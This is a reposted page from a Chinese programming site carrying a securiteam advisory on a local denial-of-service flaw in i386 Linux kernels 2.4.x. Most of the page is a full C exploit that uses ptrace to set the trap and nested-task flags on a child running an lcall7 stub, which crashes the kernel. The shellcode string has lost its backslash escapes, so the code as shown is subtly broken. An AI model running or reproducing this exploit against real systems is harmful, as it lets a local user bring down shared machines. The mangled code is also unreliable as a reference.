软讯网络 > 编程语言 > C/C++ > i386 Linux Kernel DoS(Local)
【标 题】:i386 Linux Kernel DoS(Local)
【关键字】:
c,in,Linux,DoS,Local,Do,Kernel,i386,Linux,Kernel,DoS,Local
【来 源】:网络
i386 Linux Kernel DoS(Local)
Vulnerable systems:
* Linux Kernel version 2.4.18 and prior
* Linux Kernel version 2.4.19
* Linux Kernel version 2.4.20-rc1
Exploit:
#include <sys/ptrace.h>
struct user_regs_struct {
long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
long orig_eax, eip;
unsigned short cs, __cs;
long eflags, esp;
unsigned short ss, __ss;
};
int main( void )
{
int pid;
char dos[] = "x9Ax00x00x00x00x07x00";
void (* lcall7)( void ) = (void *) dos;
struct user_regs_struct d;
if( ! ( pid = fork() ) )
{
usleep( 1000 );
(* lcall7)();
}
else
{
ptrace( PTRACE_ATTACH, pid, 0, 0 );
while( 1 )
{
wait( 0 );
ptrace( PTRACE_GETREGS, pid, 0, &d );
d.eflags |= 0x4100; /* set TF and NT */
ptrace( PTRACE_SETREGS, pid, 0, &d );
ptrace( PTRACE_SYSCALL, pid, 0, 0 );
}
}
return 1;
}
Additional information
The information has been provided by Christophe Devine.
来源:securiteam
|
|